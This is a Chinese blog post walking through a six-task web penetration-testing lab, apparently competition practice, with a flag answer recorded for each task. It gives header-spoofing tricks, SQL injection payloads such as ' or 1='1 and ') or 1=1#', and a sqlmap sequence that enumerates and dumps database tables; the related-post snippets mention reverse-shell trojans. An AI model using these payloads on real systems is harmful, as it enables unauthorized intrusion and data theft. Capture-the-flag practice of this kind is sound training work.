WEB综合渗透

已于 2022-11-22 19:14:09 修改
阅读量3.8k 收藏 11
点赞数 6
分类专栏: 网络安全 文章标签: 前端 html
于 2022-11-22 19:13:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JJH2724719395/article/details/127966779
版权

1.通过浏览器访问http://靶机IP/1,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包修改用户代理(User-Agent)

修改为 User-Agent:ERROR

 flag:zTdKVpUKJu

2.通过浏览器访问http://靶机IP/2,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加  X-Forwarded-For:192.168.1.1

flag:6i3zXHDPOx

3.通过浏览器访问http://靶机IP/3,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加SQL注入万能语句  ' or 1='1

flag:7Z9hwFpOlf

4.通过浏览器访问http://靶机IP/4,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

通过burp抓包添加 ") or 1=1#                    #使用") # 符号过滤

flag:YbR0BlQEVo

5.通过浏览器访问http://靶机IP/5,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

在URL中添加 ' oorr 1=1--+

flag:rNPco4KBLN

6.通过浏览器访问http://靶机IP/6,对该页面进行渗透测试,找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;

详细步骤:

通过burp抓取POST数据包,并将信息保存为1.txt 

sqlmap -r 1.txt                     #检测是否存在注入点

sqlmap -r 1.txt --dbs                #爆破出所有数据库

sqlmap -r 1.txt -D hello --tables           #选择要爆破的数据库进行爆表操作

 

 sqlmap -r 1.txt -D hello -T user --columns           #确定表名,然后对字段进行爆破猜解

sqlmap -r 1.txt -D hello -T user -C id,username --dump              #爆破字段值

将id修改为2779/7269/8980,都可以获取flag

 

 

flag:C9K8TVwf7Z

2023年网络安全比赛--Web综合渗透测试中职组(超详细)
Aluxian_的博客
02-08 2323
1.通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG提交;2.通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG提交;3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG提交;4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG提交
2023福建省“信息安全管理与评估“——Web综合渗透测试(高职组)
Aluxian_的博客
04-09 978
在A集团的网络中存在几台服务器,各服务器存在着不同业务服务。在网络中存在着一定网络安全隐患,利用你所掌握的渗透测试技术,通过信息收集、漏洞挖掘等渗透测试技术,完成指定项目的渗透测试,在测试中获取flag。 本模块所使用到的渗透测试技术包含但不限于如下技术领域: • 信息收集 • 逆向文件分析 • 二进制漏洞利用 • 应用服务漏洞利用 • 操作系统漏洞利用 • 杂项与密码学分析 • 系统文件分析
CTF类题目复现总结-greatescape 1
最新发布
weixin_42487326的博客
03-17 383
CTF类题目复现总结-greatescape 1
渗透测试1-4
qq_57305150的博客
03-11 688
渗透测试-1N.使⽤mmap扫描靶机系统,将靶机开放的端⼝号按从⼩到⼤的顺序作为FLAG(形式:k端⼝N,端⼝O…,端⼝nl)提…O 通过上述端⼝访问靶机系统,使⽤弱⼝令进⾏登录,将正确的⽤户名和密码作为FLAG(形式:k⽤户名,密码l)…弱口令: 地址:http://靶机地址:8080/wordpress/wp-login.php? 用户:admin 密码:123456P.利⽤区ali渗透机⽣成反弹⽊⻢,将⽣成⽊⻢命令执⾏后提示的第四⾏的⾸个单词作为FLAG(形式式:k
记一次猫舍由外到内的渗透撞库操作提取-flag
m0_65606241的博客
06-06 1400
猫舍靶场由外网打点进入内网后通过内网漏洞提权做撞库操作,最后拿到我们需要的成果
靶机渗透测试4
qq_52191935的博客
09-01 1662
测试环境:靶机+kali 1.nmap扫描存活主机,得到靶机IP为192.168.152.131 2.对靶机进行全端口扫描,发现80端口(HTTP)及7744端口(SSH)开放 3.根据下载时的提示,要设置hosts文件才能访问到网站 先修改hosts文件,在linux中路径为/etc/hosts,添加如下配置 配置完成后访问80端口,发现访问成功 4.通过网页查看到第一个flag得到提示可以使用cewl 5.通过kail的cewl工具生成密码字典,为了便于使用...
渗透测试学习(一)
SopRomeo的博客
12-08 539
vulnhub-CD1 这是初级,非常适合菜鸡 下载后虚拟机打开,选择桥接模式 要登录 信息收集,因为处于同一网段 arp-scan,扫内网网段的神器 首先查看自己windows的ip 扫到一个ip nmap 扫端口 nmap -sS T4 -A -p- -v 192.168.10.1 4级速度扫描端口,做一次全面扫描 开放四个端口 22,111,80,34374 访问网站 Drupal 框架写的站点 看到大多数提权都是用MSF进行攻击的 kali启动 用2018年的漏洞进行攻击 ...
网安招新题
qq_73824705的博客
11-19 1662
网安招新赛的简单题
CTF训练 -- 常见的加密算法
Web安全工具库
08-20 3996
我好像已经缓不过来了,我开始变的越来越不想说话,暴躁懒惰焦虑失眠,拿起手机又不知道干嘛,我不知道我怎么了。。。 ---- 网易云热评 一、栅栏里的兔子 密文:U2FsdGVkX18+njhMGUdjMd7tALPRqAARTOLy063675ywRw== flag格式flag{xxxxx} 1、首先用rabbit解密 https://www.sojson.com/encrypt_rabbit.html 解密后:fulbaugc{uaoioy1o} 2、再通过栅...
web渗透-CTF杂项练习题
08-11
压缩包中有各种CTF杂项练习题,每种题型各一个,部分题目文件已将答案(如分离好的图片)一包含,细心鉴别以防做题时引发误解
全国职业院校技能大赛网络安全之web;mysql安全之综合渗透测试
m0_54849873的博客
06-21 661
****通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为Flag提交flag{htmlcode}通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为Flag提交flag{vimbakswp}通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为Flag提交flag{spider}4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为
webflag-开源
04-26
webflag是一个基于Web的软件,可以帮助您找到魔兽世界中的其他角色扮演者。 webflag使flagRSP附加组件系列中的字符描述在网络上可用。 您可以根据课程和级别范围搜索RP播放器
web靶机渗透思路--web渗透笔记-思路,综合渗透笔记思路(入门)(待补全)
m0_73935461的博客
04-11 2384
1. 信息收集:收集目标网站的相关信息,包括域名、IP地址、服务器类型、网站架构等。 2. 漏洞扫描:使用漏洞扫描工具对目标网站进行扫描,发现可能存在的漏洞,如SQL注入、XSS、文件上传等。 3. 弱口令测试:对目标网站的登录界面、管理员后台等进行弱口令测试,尝试使用常见的弱口令进行登录。 4. 目录遍历:通过目录遍历攻击手法,尝试访问目标网站的敏感文件和目录,如配置文件、日志文件等。 5. 文件上传测试:对目标网站的文件上传功能进行测试,尝试上传恶意文件,执行任意代码。 6. XSS攻击:通
CTF基础知识
m0_65849838的博客
04-26 6669
文章目录一. CTF简介1.开启题目点击题目附件2.得到正文和flag①正文②FLAG.竞赛模式1.开启题目点击题目附件2.正文和flag①正文理论知识Jeopardy-解题AwD-攻防模式AWP-攻防增强RHG-自动化[ AI自动化]RW-真实世界KoH-抢占山头Mix[混合]②flag.比赛形式1.开启题目点击题目附件2.正文和flag①正文线上线下②flag.题目1.开启题目点击题目附件二.正文和flag①正文WebPwnReverseCryptoMisc②flag. CTF简介 1
实训作业四
2301_80652627的博客
11-24 1485
右键查看源码,即可找到flag
2021-01-31
m0_54628962的博客
01-31 1173
20210131CTF题目练习 1.web1:view_source 打开网页 因右键无法使用,想要查看源代码可以使用Ctrl+u来查看,或可以在地址栏前面加上view_source:来查看 即可得到flag,如图 2.web2:robots 打开网页,在网址后加上robots.txt,查看文件里的内容 将文件中flag部分粘贴复制至网址后得到flag 3.Misc题目:this_is_flag 题目答案即题目描述后for example后面的内容 4.crypto题目:base64 点击附
渗透测试--CTF--FLAG
qq_50034496的博客
12-06 5910
渗透测试--CTF--FLAG
BugkuCTF-WEB-flag在index里
烟雨天青色
08-27 2714
这道题打开题目链接之后,页面只显示了一个名为“click me?no”的超链接,点开它。 点开之后可以发现页面变成的如图所示的样子,注意网页的url,根据url基本可以判断,这道题目属于文件包含类漏洞。 现在已知是文件包含漏洞的题目了,下一步我们就需要去读取被包含文件的内容,使用php://filter伪协议,具体如下: php://filter/read=convert.base...
Web安全之综合渗透测试
明裕学长的博客
05-24 2127
任务环境说明:服务器场景:Web2003-2服务器场景用户名、密码:未知(关闭链接) 渗透机环境说明:BT5渗透机用户名:root密码:toorKali渗透机用户名:root密码:toorWindows7渗透机用户名:administrator密码:123456 Web2003-2--1 172.16.105.248 1、通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为Flag提交Flag[flag{htmlcode}] 操作如下 在浏览器中输入
web 渗透测试 综合案例
01-05
### Web 渗透测试综合案例研究 #### 背景介绍 Web 应用程序的安全性至关重要,因为它们经常处理敏感数据成为攻击者的目标。渗透测试是一种评估这些应用程序安全性的重要手段。通过模拟真实的攻击场景,可以识别潜在漏洞采取相应的防护措施。 #### 综合案例分析 一个典型的 web 渗透测试项目可能涉及多个阶段的工作流程: 1. **情报收集** - 使用公开可用的信息源来获取目标系统的背景资料。 - 利用搜索引擎、社交媒体和其他在线平台寻找有关网站的技术细节和架构信息[^2]。 2. **威胁建模** - 基于已知的情报构建出合理的假设模型。 - 明确哪些部分最有可能受到攻击以及为什么。 3. **漏洞扫描** - 自动化工具用于检测常见缺陷,如 SQL 注入、跨站脚本(XSS)等。 - 手工审查代码逻辑以发现更深层次的问题。 4. **利用与验证** - 尝试利用找到的任何弱点来进行实际操作。 - 记录下每一步骤及其影响范围;确保所有行动都在授权范围内执行。 5. **报告撰写** - 编写详细的文档说明整个过程中的发现事项。 - 提供修复建议和技术指导给开发团队以便他们能够及时解决问题。 6. **后续跟进** - 定期复查之前指出过的风险点是否已被妥善解决。 - 更新内部安全政策以防止未来发生类似的事件。 ```python import requests def check_sql_injection(url): """简单SQL注入检查函数""" payload = "' OR '1'='1" response = requests.get(f"{url}?id={payload}") if "You have an error in your SQL syntax;" in response.text: print("[!] 可能存在SQL注入漏洞") else: print("[-] 未检测到明显的SQL注入迹象") check_sql_injection('http://example.com/vulnerable_page') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

浩~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值